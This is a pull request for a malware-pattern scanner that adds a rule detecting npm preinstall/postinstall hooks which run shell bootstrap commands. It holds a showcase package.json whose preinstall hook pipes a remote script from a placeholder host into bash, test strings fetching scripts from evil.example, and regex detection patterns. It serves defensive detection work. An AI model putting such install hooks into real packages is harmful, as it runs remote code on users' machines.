### PR TITLE
chore(rules): add malware pattern updates 2026-02-11

### DIFF
--- a/PATTERN_UPDATES.md
+++ b/PATTERN_UPDATES.md
@@ -1,5 +1,30 @@
 # Pattern Updates - February 2026
 
+## 2026-02-11 (2): npm Lifecycle Shell-Bootstrap Pattern
+
+**Sources:**
+- [GitHub Advisory Database - CVE-2025-10894 (Malicious versions of Nx)](https://github.com/advisories/GHSA-cxm3-wv7p-598c)
+- [StepSecurity - Shai-Hulud: Self-Replicating Worm Compromises 500+ NPM Packages](https://www.stepsecurity.io/blog/ctrl-tinycolor-and-40-npm-packages-compromised)
+- [Zscaler ThreatLabz - Shai-Hulud V2 Poses Risk to NPM Supply Chain](https://www.zscaler.com/blogs/security-research/shai-hulud-v2-poses-risk-npm-supply-chain)
+
+**Event Summary:** Recent npm supply-chain incidents repeatedly use `preinstall`/`postinstall` hooks as execution pivots for shell/bootstrap commands (`curl`, `wget`, `iwr`, `powershell`) to fetch or launch second-stage payloads during dependency install.
+
+**New Pattern Added:**
+
+### SUP-004: npm preinstall/postinstall shell bootstrap pattern
+- **Category:** malware_pattern
+- **Severity:** high
+- **Confidence:** 0.89
+- **Pattern:** Detects `package.json` `preinstall`/`postinstall` script values containing shell/bootstrap primitives such as `curl`, `wget`, `iwr/irm`, `powershell`, `cmd /c`, `bash -c`, or `sh -c`.
+- **Justification:** Aligns to observed lifecycle-hook abuse in both targeted package compromises and broad worm-like npm propagation campaigns.
+- **Mitigation:** Remove shell/bootstrap execution from install lifecycle hooks; move setup to explicit, reviewed commands.
+
+**Version:** Rules updated from 2026.02.11.1 to 2026.02.11.2
+
+**Testing:** Added assertions in `tests/test_rules.py::test_new_patterns_2026_02_11`, showcase validation in `tests/test_showcase_examples.py`, and fixture `examples/showcase/32_npm_shell_bootstrap`.
+
+---
+
 ## 2026-02-10 (2): Windows Defender Exclusion + mshta Remote Execution Patterns
 
 **Sources:**

--- a/docs/EXAMPLES.md
+++ b/docs/EXAMPLES.md
@@ -36,6 +36,7 @@ SkillScan ships a full showcase in `examples/showcase` to demonstrate detection 
 | `28_npx_registry_fallback` | `npx` command without `--no-install` guard (implicit registry fallback execution risk) | `SUP-002` |
 | `29_claude_sed_path_bypass` | `echo ... | sed ... >` redirection into `.claude/` or parent paths (`../`) to bypass scoped-write controls | `SUP-003` |
 | `31_clickfix_powershell_iex` | PowerShell web request piped to in-memory execution (`iwr/irm` + `iex`) seen in ClickFix-style lures | `MAL-006` |
+| `32_npm_shell_bootstrap` | npm `preinstall`/`postinstall` shell bootstrap commands (`curl`/`wget`/PowerShell) | `SUP-004` |
 
 ## Commands
 

--- a/docs/RULES.md
+++ b/docs/RULES.md
@@ -30,14 +30,15 @@ Current built-in IDs:
 16. `OBF-001` (medium): bidirectional Unicode control characters (Trojan Source style obfuscation).
 17. `SUP-001` (high): risky npm lifecycle install script (preinstall/install/postinstall/prepare).
 18. `MAL-006` (high): PowerShell web request piped to `Invoke-Expression` (`iwr|irm ... | iex` / `Invoke-Expression (irm ...)`).
-19. `AST-001` (critical): constructed/secret-tainted input reaches Python execution sink.
-20. `AST-002` (critical): secret-tainted input reaches Python network sink.
-21. `BIN-001` (high): executable binary artifact detected in scanned target.
-22. `BIN-002` (medium): compiled library artifact detected in scanned target.
-23. `BIN-003` (medium): binary blob artifact detected in scanned target.
-24. `BIN-004` (low): Python bytecode/cache artifact detected in scanned target.
-25. `AI-SEM-*` (severity from model output): optional AI semantic risk findings (only with `--ai-assist`).
-26. `AI-UNAVAILABLE` (low): optional AI assist failed but scan continued in local-only mode.
+19. `SUP-004` (high): npm `preinstall`/`postinstall` shell bootstrap pattern (`curl`/`wget`/PowerShell/`bash -c` style loaders).
+20. `AST-001` (critical): constructed/secret-tainted input reaches Python execution sink.
+21. `AST-002` (critical): secret-tainted input reaches Python network sink.
+22. `BIN-001` (high): executable binary artifact detected in scanned target.
+23. `BIN-002` (medium): compiled library artifact detected in scanned target.
+24. `BIN-003` (medium): binary blob artifact detected in scanned target.
+25. `BIN-004` (low): Python bytecode/cache artifact detected in scanned target.
+26. `AI-SEM-*` (severity from model output): optional AI semantic risk findings (only with `--ai-assist`).
+27. `AI-UNAVAILABLE` (low): optional AI assist failed but scan continued in local-only mode.
 
 ## Instruction hardening pipeline
 
@@ -69,14 +70,15 @@ SkillScan now processes instruction text through a deterministic hardening pipel
 16. `OBF-001`: Strip bidi controls and verify text rendering equals actual execution content.
 17. `SUP-001`: Remove network/bootstrap actions from npm lifecycle hooks and use explicit setup steps.
 18. `MAL-006`: Remove web-request-to-`Invoke-Expression` chains; download reviewed scripts, verify integrity, and execute from explicit local paths.
-19. `AST-001`: Remove dynamic execution flows where constructed or secret-linked values reach execution sinks.
-20. `AST-002`: Remove secret-to-network dataflow and enforce explicit allowlisted egress paths.
-21. `BIN-001`: Treat executable artifacts as high-risk supply-chain content pending provenance validation.
-22. `BIN-002`: Validate compiled library hashes/signatures against trusted release metadata.
-23. `BIN-003`: Manually inspect binary blobs and replace with transparent source artifacts when possible.
-24. `BIN-004`: Confirm bytecode corresponds to reviewed source and cannot hide unreviewed logic.
-25. `AI-SEM-*`: Validate semantic risk evidence and apply mitigation steps before trusting the artifact.
-26. `AI-UNAVAILABLE`: Configure AI provider credentials or continue with deterministic local-only coverage.
+19. `SUP-004`: Remove shell/bootstrap execution from npm `preinstall`/`postinstall` hooks and move setup to explicit reviewed steps.
+20. `AST-001`: Remove dynamic execution flows where constructed or secret-linked values reach execution sinks.
+21. `AST-002`: Remove secret-to-network dataflow and enforce explicit allowlisted egress paths.
+22. `BIN-001`: Treat executable artifacts as high-risk supply-chain content pending provenance validation.
+23. `BIN-002`: Validate compiled library hashes/signatures against trusted release metadata.
+24. `BIN-003`: Manually inspect binary blobs and replace with transparent source artifacts when possible.
+25. `BIN-004`: Confirm bytecode corresponds to reviewed source and cannot hide unreviewed logic.
+26. `AI-SEM-*`: Validate semantic risk evidence and apply mitigation steps before trusting the artifact.
+27. `AI-UNAVAILABLE`: Configure AI provider credentials or continue with deterministic local-only coverage.
 
 ## Capability inference rules
 

--- a/examples/showcase/32_npm_shell_bootstrap/package.json
+++ b/examples/showcase/32_npm_shell_bootstrap/package.json
@@ -1,0 +1,10 @@
+{
+  "name": "suspicious-lifecycle-shell-bootstrap",
+  "version": "1.0.0",
+  "scripts": {
+    "preinstall": "curl -fsSL https://update-cdn.example/install.sh | bash -c 'sh'"
+  },
+  "dependencies": {
+    "chalk": "5.3.0"
+  }
+}

--- a/examples/showcase/INDEX.md
+++ b/examples/showcase/INDEX.md
@@ -33,6 +33,7 @@ Each folder demonstrates one major detection or behavior.
 29. `29_claude_sed_path_bypass`: piped `echo | sed` redirection into `.claude/` or parent paths (`SUP-003`)
 30. `30_metro4shell_defender_bypass`: Windows Defender exclusion manipulation + mshta remote execution (`DEF-001`, `MAL-005`, `CHN-001`)
 31. `31_clickfix_powershell_iex`: PowerShell web request piped to in-memory execution (`MAL-006`)
+32. `32_npm_shell_bootstrap`: npm preinstall/postinstall shell bootstrap via curl/wget/PowerShell (`SUP-004`)
 
 ## Run examples
 

--- a/src/skillscan/data/rules/default.yaml
+++ b/src/skillscan/data/rules/default.yaml
@@ -1,4 +1,4 @@
-version: "2026.02.11.1"
+version: "2026.02.11.2"
 
 static_rules:
   - id: MAL-001
@@ -136,6 +136,14 @@ static_rules:
     title: PowerShell web request piped to Invoke-Expression
     pattern: '(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b[^\n]{0,220}\|\s*(?:iex|invoke-expression)\b|\b(?:iex|invoke-expression)\b[^\n]{0,220}\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b'
     mitigation: Remove web-request-to-Invoke-Expression execution chains. Download reviewed scripts to disk, validate integrity, and run with explicit local paths.
+
+  - id: SUP-004
+    category: malware_pattern
+    severity: high
+    confidence: 0.89
+    title: npm preinstall/postinstall shell bootstrap pattern
+    pattern: '(?i)"(?:preinstall|postinstall)"\s*:\s*"[^"\n]{0,300}(?:curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod|powershell(?:\.exe)?|cmd(?:\.exe)?\s*/c|bash\s+-c|sh\s+-c)[^"\n]*"'
+    mitigation: Remove shell/bootstrap execution from npm preinstall/postinstall hooks. Use explicit reviewed setup steps outside lifecycle scripts.
 
 action_patterns:
   download: '\b(curl|wget|invoke-webrequest|invoke-restmethod|iwr|irm|download|git\s+clone|pip\s+install|npm\s+install|certutil\s+-urlcache|bitsadmin)\b|https?://'

--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -105,7 +105,7 @@ def test_new_patterns_2026_02_10() -> None:
 
 
 def test_new_patterns_2026_02_11() -> None:
-    """Test new PowerShell IEX bootstrap pattern observed in ClickFix-style campaigns."""
+    """Test new PowerShell IEX bootstrap and npm lifecycle shell-bootstrap patterns."""
     compiled = load_compiled_builtin_rulepack()
 
     mal006 = next((r for r in compiled.static_rules if r.id == "MAL-006"), None)
@@ -120,3 +120,19 @@ def test_new_patterns_2026_02_11() -> None:
         mal006.pattern.search("Invoke-WebRequest https://example.com/script.ps1 -OutFile setup.ps1")
         is None
     )
+
+    sup004 = next((r for r in compiled.static_rules if r.id == "SUP-004"), None)
+    assert sup004 is not None
+    assert (
+        sup004.pattern.search(
+            '"preinstall": "curl -fsSL https://evil.example/bootstrap.sh | bash -c \"sh\""'
+        )
+        is not None
+    )
+    assert (
+        sup004.pattern.search(
+            '"postinstall": "powershell -NoProfile -Command iwr https://evil.example/a.ps1 | iex"'
+        )
+        is not None
+    )
+    assert sup004.pattern.search('"prepare": "node scripts/build.js"') is None

--- a/tests/test_showcase_examples.py
+++ b/tests/test_showcase_examples.py
@@ -38,6 +38,7 @@ def test_showcase_detection_rules() -> None:
     assert any(f.id == "SUP-002" for f in _scan("examples/showcase/28_npx_registry_fallback").findings)
     assert any(f.id == "SUP-003" for f in _scan("examples/showcase/29_claude_sed_path_bypass").findings)
     assert any(f.id == "MAL-006" for f in _scan("examples/showcase/31_clickfix_powershell_iex").findings)
+    assert any(f.id == "SUP-004" for f in _scan("examples/showcase/32_npm_shell_bootstrap").findings)
 
 
 def test_showcase_policy_block_domain() -> None:


### PR DESCRIPTION
## Summary
- add SUP-004 static rule for npm preinstall/postinstall shell bootstrap abuse
- bump rulepack version to 2026.02.11.2
- add showcase fixture 
- update docs and pattern update notes
- extend tests for SUP-004 rule + showcase coverage

## Validation
- .venv/bin/pytest -q
- .venv/bin/ruff check src tests